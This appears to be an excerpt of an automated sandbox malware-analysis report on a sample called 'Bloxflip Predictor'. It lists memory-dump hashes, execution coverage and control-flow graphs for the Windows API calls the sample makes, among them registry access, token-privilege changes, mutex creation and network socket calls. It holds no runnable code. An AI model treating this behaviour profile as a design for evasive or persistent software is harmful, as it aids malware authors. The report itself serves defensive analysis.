                                            • Instruction Fuzzy Hash: A301B1B16052448FDB148F55D885765FBD4DF15320F08C4EADD098B652D275E408CA62
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0e83d2e150e8434de6b7d17c31e41317772e50ae357ec28d1edd8af1aeb2412
                                            • Instruction ID: 755ead231c53be149ad3d8fa7d1c48a2691f86938a0044599d6bae268e8c8b54
                                            • Opcode Fuzzy Hash: e0e83d2e150e8434de6b7d17c31e41317772e50ae357ec28d1edd8af1aeb2412
                                            • Instruction Fuzzy Hash: 68F11530A00218CFDB24EB34D951BAD77B2FF89308F1045A9D90AAB7A9DB355D81CF61
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 379cd4a190a50a32828ce639074ff94c33cc3903d06abca0bedc7dc875defd18
                                            • Instruction ID: 70f390d44a2bc228ca97b464815dd5c2e5d9f482c75c03c1c7dddcc720c58e4d
                                            • Opcode Fuzzy Hash: 379cd4a190a50a32828ce639074ff94c33cc3903d06abca0bedc7dc875defd18
                                            • Instruction Fuzzy Hash: B0E12830A00318CFDB15EF78D981BADB7B2EF89308F1045A9D4056B7A9DB359946CF60
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d10af5418d32d5102f251afdef33299c1a1d3cac20487ee8292fb6dbfcac9194
                                            • Instruction ID: 7d278d9d3a89dd461902fbd63b13cf9d2f31b338db4180de2fe52641cc66fc42
                                            • Opcode Fuzzy Hash: d10af5418d32d5102f251afdef33299c1a1d3cac20487ee8292fb6dbfcac9194
                                            • Instruction Fuzzy Hash: 8FE10634A00219CFDB24EF34D951BAD77B2FB89308F1045A9D90A9B7A9DB359D81CF60
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce4b3fcda4a3002b10e2cfaec96586f6d9d5d6177d21b1048445e428e1e711dd
                                            • Instruction ID: a39ac7bedbdd26f91f6d73a568be224d61d9ef38f517e671694397e56f71b0fd
                                            • Opcode Fuzzy Hash: ce4b3fcda4a3002b10e2cfaec96586f6d9d5d6177d21b1048445e428e1e711dd
                                            • Instruction Fuzzy Hash: 16A11630A00219CFEB15EF74D991BADB7B2EB85308F1044A9D5066B7A9DB359D82CF60
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3879da3e1e0a5ff81aea1d15a6ecffbee8d325399186f0a60ca1679217beb3a1
                                            • Instruction ID: 1d5357df43c489dc875afab69f7de1caf1f6103a84594cc54926458cbd109ab6
                                            • Opcode Fuzzy Hash: 3879da3e1e0a5ff81aea1d15a6ecffbee8d325399186f0a60ca1679217beb3a1
                                            • Instruction Fuzzy Hash: AD813630116381CFC705EF38E6519997BF2EF9220CB15899DD0458FA6EDB34990ACBB1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145042656.0000000000FF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_ff0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba62d402eef9cca798c60462c43938124daa7e63edb672e022d3ed564827296c
                                            • Instruction ID: 0c92d98d8ea10b6b344932a677c889c07abb9ee4b90f7ab2a06937c8f01a0e51
                                            • Opcode Fuzzy Hash: ba62d402eef9cca798c60462c43938124daa7e63edb672e022d3ed564827296c
                                            • Instruction Fuzzy Hash: B901D6B650E7806FD7128B159C40862FFB8EF86630709C4DFEC898B652D129A909CB72
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145042656.0000000000FF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_ff0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 50773ab865c18f9b72f8a5f753875d58c4ebb9e73f1e24ed8ace573029e0413d
                                            • Instruction ID: fe22bda2c234edbd51f08d88006b39e296ff0581ab34533ee9bef62c2cb0dded
                                            • Opcode Fuzzy Hash: 50773ab865c18f9b72f8a5f753875d58c4ebb9e73f1e24ed8ace573029e0413d
                                            • Instruction Fuzzy Hash: 19E092B66016004B9750CF0AEC41452F7D8EB84631708C47FDC0D8B701D639B508CAA5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143861280.0000000000BF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bf2000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 587f4d76bc4e95ff84e9701ee7d8fe2f07d1a81d1fd241fa04a30854e40594ed
                                            • Instruction ID: f9038f80dea991174445e703a6105ab8c2324c9460e9cd263cb8fac22e24e4e1
                                            • Opcode Fuzzy Hash: 587f4d76bc4e95ff84e9701ee7d8fe2f07d1a81d1fd241fa04a30854e40594ed
                                            • Instruction Fuzzy Hash: 38D05E792056C14FD3179B1CC1A9BA937D4AB61714F4A44FAA9008B763C7A8D985D610
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143861280.0000000000BF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bf2000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 857784f115e88e2747edb077320b55733747d615b75ae608732bd21c083db2db
                                            • Instruction ID: f992fe3d7e94511a8267c1c7b15a9ff3abc2fd894b9dc8d3498e607e9261d6b2
                                            • Opcode Fuzzy Hash: 857784f115e88e2747edb077320b55733747d615b75ae608732bd21c083db2db
                                            • Instruction Fuzzy Hash: 02D05E742006854FC715DB0CC6D4F6937D4AB50B14F0644E8AC108B762C7B8D8C9CA00
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2145072711.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1020000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2092936dbf62254988bbab373aa57b69bedfe05f03e45f3094b29dca96e0c0d0
                                            • Instruction ID: 36020b178890b17c6f99aca4687a0c996c8272fbbd63b0a88b2d661fc2f65448
                                            • Opcode Fuzzy Hash: 2092936dbf62254988bbab373aa57b69bedfe05f03e45f3094b29dca96e0c0d0
                                            • Instruction Fuzzy Hash: 5CC02B36B001358B8F0037F974053DCF314DED402D704002AC118820008F34C11547F3

                                            Execution Graph

                                            Execution Coverage:18%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.8%
                                            Total number of Nodes:168
                                            Total number of Limit Nodes:6
                                            APIs
                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05EE2B77
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdjustPrivilegesToken
                                            • String ID:
                                            • API String ID: 2874748243-0
                                            • Opcode ID: e638a05399a0063b87e80fb8ac6691521fce80888832aebcd5cf380d43649dc7
                                            • Instruction ID: 9a62fdb417339a3fe767749c00775fffc5c2791d35941d4604a2d48f16413b52
                                            • Opcode Fuzzy Hash: e638a05399a0063b87e80fb8ac6691521fce80888832aebcd5cf380d43649dc7
                                            • Instruction Fuzzy Hash: E1218D755097849FEB228F25DC44B52BFB8BF06214F0884DAE9858B563D271A908CB62
                                            APIs
                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05EE2B77
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: AdjustPrivilegesToken
                                            • String ID:
                                            • API String ID: 2874748243-0
                                            • Opcode ID: 38b9351c0241ac6df0c9d3c86604b1bb8679b98a84b719440cfe01c9306a88a7
                                            • Instruction ID: a870977de2fe52c918c9c49a854f51471d78908e3c98c68277f69c7ed8999903
                                            • Opcode Fuzzy Hash: 38b9351c0241ac6df0c9d3c86604b1bb8679b98a84b719440cfe01c9306a88a7
                                            • Instruction Fuzzy Hash: 511170755106049FEB20CF55D844B66FBE9FF04224F08C4AAEE8A8B652E371E418CF71
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff5b0da4274471446c909076c3b1df566a54d2a6607f68bb037ba9a8d35ca3ed
                                            • Instruction ID: 1a5ec33e19be5801e2f0b9700248960607da89b187b3987030a20107520fe53e
                                            • Opcode Fuzzy Hash: ff5b0da4274471446c909076c3b1df566a54d2a6607f68bb037ba9a8d35ca3ed
                                            • Instruction Fuzzy Hash: 5151D331B00205ABDB18DB75AC19BAE36A3ABE5358F1445389115DB3E4DE39AC06C7A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd67412700c3efaa6e7aab1c60753239ad920f97a46ca421ca114b3d65e63c9e
                                            • Instruction ID: d80b18e4eab023d79e2db20f31737ea7b399b3ee5897e090a39136d447f7de9e
                                            • Opcode Fuzzy Hash: fd67412700c3efaa6e7aab1c60753239ad920f97a46ca421ca114b3d65e63c9e
                                            • Instruction Fuzzy Hash: 9D51E531700205ABDF18DB79AC19BAE36A7DBE5344F144538D115DB3E4DE39AC05C7A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 11baf30-11bafed 5 11bafef 0->5 6 11baff2-11bb009 0->6 5->6 8 11bb04b-11bb050 6->8 9 11bb00b-11bb01e RegOpenKeyExW 6->9 8->9 10 11bb052-11bb057 9->10 11 11bb020-11bb048 9->11 10->11
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 011BB011
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: ac2970658534813a7305fd02efbc8afceccf6a16abe1d202993740097db875b3
                                            • Instruction ID: 718954af017d250a9950b624bdf34f486a61bc35e7dcac10239b8b4d0197c959
                                            • Opcode Fuzzy Hash: ac2970658534813a7305fd02efbc8afceccf6a16abe1d202993740097db875b3
                                            • Instruction Fuzzy Hash: 4541B5B14097806FE7138B649C45BA6BFB8EF16314F0985DAE9848B5A3D224990AC771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 16 5ee25ff-5ee26cf 22 5ee2721-5ee2726 16->22 23 5ee26d1-5ee26d9 getaddrinfo 16->23 22->23 24 5ee26df-5ee26f1 23->24 26 5ee2728-5ee272d 24->26 27 5ee26f3-5ee271e 24->27 26->27
                                            APIs
                                            • getaddrinfo.WS2_32(?,00000E24), ref: 05EE26D7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: getaddrinfo
                                            • String ID:
                                            • API String ID: 300660673-0
                                            • Opcode ID: a142c80b4f89f0bdbe0e238a0d482383de99f7b5ea555276a490ebd3c55cc1da
                                            • Instruction ID: d45b619984d9af0d57940b4ac80a9fe0958f27d17d9f63b70e971663c1b6fc42
                                            • Opcode Fuzzy Hash: a142c80b4f89f0bdbe0e238a0d482383de99f7b5ea555276a490ebd3c55cc1da
                                            • Instruction Fuzzy Hash: D431A3B2504344AFE7228F60CC44FA6BBECEF05314F14449AFA849B292D375A949CB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 31 5ee1d5a-5ee1ded 36 5ee1def 31->36 37 5ee1df2-5ee1e09 31->37 36->37 39 5ee1e0b-5ee1e13 RegOpenKeyExW 37->39 40 5ee1e58-5ee1e5d 37->40 41 5ee1e19-5ee1e2b 39->41 40->39 43 5ee1e5f-5ee1e64 41->43 44 5ee1e2d-5ee1e55 41->44 43->44
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE1E11
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 9a275f615fafba55b4ade19bc7dc56e23cf667adee6596deac5d32d37ba2393a
                                            • Instruction ID: 81b5be215726e83ab397b71aa1939060a154fc6118fbe77ecfe3db201247984a
                                            • Opcode Fuzzy Hash: 9a275f615fafba55b4ade19bc7dc56e23cf667adee6596deac5d32d37ba2393a
                                            • Instruction Fuzzy Hash: 2131CFB2404344AFE7228F20DC44FA7BBACEF55314F04889AE9858B252E374E509CBB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 48 5ee48ca-5ee494e 52 5ee4953-5ee495f 48->52 53 5ee4950 48->53 54 5ee4964-5ee496d 52->54 55 5ee4961 52->55 53->52 56 5ee496f 54->56 57 5ee4972-5ee4989 54->57 55->54 56->57 59 5ee49cb-5ee49d0 57->59 60 5ee498b-5ee499e RegCreateKeyExW 57->60 59->60 61 5ee49d2-5ee49d7 60->61 62 5ee49a0-5ee49c8 60->62 61->62
                                            APIs
                                            • RegCreateKeyExW.KERNEL32(?,00000E24), ref: 05EE4991
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 0e16c7e1aca64d17d0bfe6e52befead5ac77bfdbce49008d07ed6b93c0cf2869
                                            • Instruction ID: e2a4c9b99630a47302bff8c22453123ab48227e111c5b7b41f9411a0c7558f47
                                            • Opcode Fuzzy Hash: 0e16c7e1aca64d17d0bfe6e52befead5ac77bfdbce49008d07ed6b93c0cf2869
                                            • Instruction Fuzzy Hash: 8D31AF72104345AFEB228B21CC44FA7BBECEF19214F08859AE9859B652D325E908CB61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 94 5ee19d7-5ee1a9c GetVolumeInformationA 98 5ee1aa2-5ee1acb 94->98
                                            APIs
                                            • GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 05EE1A9A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationVolume

                                            Control-flow Graph

                                            control_flow_graph 67 5ee05a6-5ee0651 71 5ee0686-5ee068b 67->71 72 5ee0653-5ee0666 GetFileType 67->72 71->72 73 5ee068d-5ee0692 72->73 74 5ee0668-5ee0685 72->74 73->74
                                            APIs
                                            • GetFileType.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0659
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType

                                            Control-flow Graph

                                            control_flow_graph 78 5ee0bbc-5ee0bd3 80 5ee0bf5-5ee0c66 78->80 81 5ee0bd5-5ee0bf2 78->81 86 5ee0c68-5ee0c70 WSASocketW 80->86 87 5ee0cb7-5ee0cbc 80->87 81->80 88 5ee0c76-5ee0c8c 86->88 87->86 90 5ee0cbe-5ee0cc3 88->90 91 5ee0c8e-5ee0cb4 88->91 90->91
                                            APIs
                                            • WSASocketW.WS2_32(?,?,?,?,?), ref: 05EE0C6E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Socket

                                            Control-flow Graph

                                            control_flow_graph 130 5ee1f5a-5ee1fed 134 5ee1fef 130->134 135 5ee1ff2-5ee1ffe 130->135 134->135 136 5ee204d-5ee2052 135->136 137 5ee2000-5ee2008 RegOpenKeyExW 135->137 136->137 138 5ee200e-5ee2020 137->138 140 5ee2054-5ee2059 138->140 141 5ee2022-5ee204a 138->141 140->141
                                            APIs
                                            • RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05EE2006
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open

                                            Control-flow Graph

                                            control_flow_graph 100 5ee170c-5ee17a1 106 5ee17ee-5ee17f3 100->106 107 5ee17a3-5ee17ab GetProcessTimes 100->107 106->107 108 5ee17b1-5ee17c3 107->108 110 5ee17f5-5ee17fa 108->110 111 5ee17c5-5ee17eb 108->111 110->111
                                            APIs
                                            • GetProcessTimes.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE17A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ProcessTimes

                                            Control-flow Graph

                                            control_flow_graph 114 5ee18d9-5ee1963 118 5ee1968-5ee1971 114->118 119 5ee1965 114->119 120 5ee1976-5ee1985 118->120 121 5ee1973 118->121 119->118 122 5ee19c9-5ee19ce 120->122 123 5ee1987-5ee198f WSAIoctl 120->123 121->120 122->123 124 5ee1995-5ee19a7 123->124 126 5ee19a9-5ee19c6 124->126 127 5ee19d0-5ee19d5 124->127 127->126
                                            APIs
                                            • WSAIoctl.WS2_32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE198D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Ioctl

                                            Control-flow Graph

                                            control_flow_graph 161 5ee1008-5ee1089 165 5ee108e-5ee1097 161->165 166 5ee108b 161->166 167 5ee10ef-5ee10f4 165->167 168 5ee1099-5ee10a1 ConvertStringSecurityDescriptorToSecurityDescriptorW 165->168 166->165 167->168 169 5ee10a7-5ee10b9 168->169 171 5ee10bb-5ee10ec 169->171 172 5ee10f6-5ee10fb 169->172 172->171
                                            APIs
                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05EE109F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DescriptorSecurity$ConvertString

                                            Control-flow Graph

                                            control_flow_graph 145 11bae32-11baeb5 149 11baeba-11baec3 145->149 150 11baeb7 145->150 151 11baec8-11baed1 149->151 152 11baec5 149->152 150->149 153 11baed3-11baef7 CreateMutexW 151->153 154 11baf22-11baf27 151->154 152->151 157 11baf29-11baf2e 153->157 158 11baef9-11baf1f 153->158 154->153 157->158
                                            APIs
                                            • CreateMutexW.KERNEL32(?,?), ref: 011BAED9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex

                                            Control-flow Graph

                                            control_flow_graph 176 11ba51a-11ba5b0 181 11ba5fd-11ba602 176->181 182 11ba5b2-11ba5ba GetTokenInformation 176->182 181->182 183 11ba5c0-11ba5d2 182->183 185 11ba604-11ba609 183->185 186 11ba5d4-11ba5fa 183->186 185->186
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BA5B8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            APIs
                                            • RegCreateKeyExW.KERNEL32(?,00000E24), ref: 05EE4991
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Create

                                            Control-flow Graph

                                            control_flow_graph 189 11bb059-11bb10d 193 11bb10f-11bb117 SendMessageTimeoutA 189->193 194 11bb151-11bb156 189->194 196 11bb11d-11bb12f 193->196 194->193 197 11bb158-11bb15d 196->197 198 11bb131-11bb14e 196->198 197->198
                                            APIs
                                            • SendMessageTimeoutA.USER32(?,00000E24), ref: 011BB115
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: MessageSendTimeout

                                            Control-flow Graph

                                            control_flow_graph 201 11bb241-11bb2be 205 11bb2c3-11bb2cf 201->205 206 11bb2c0 201->206 207 11bb2d1 205->207 208 11bb2d4-11bb2dd 205->208 206->205 207->208 209 11bb2df-11bb303 CreateFileW 208->209 210 11bb32e-11bb333 208->210 213 11bb335-11bb33a 209->213 214 11bb305-11bb32b 209->214 210->209 213->214
                                            APIs
                                            • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 011BB2E5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 011BAC2C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            APIs
                                            • GetExitCodeProcess.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE4BF0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CodeExitProcess
                                            APIs
                                            • getaddrinfo.WS2_32(?,00000E24), ref: 05EE26D7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: getaddrinfo
                                            APIs
                                            • RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 05EE1D05
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CurrentOpenUser
                                            APIs
                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE1F10
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ChangeNotifyValue
                                            APIs
                                            • K32GetModuleInformation.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2DF6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationModule
                                            APIs
                                            • K32EnumProcessModules.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE2D06
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: EnumModulesProcess
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 05EE0ABE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
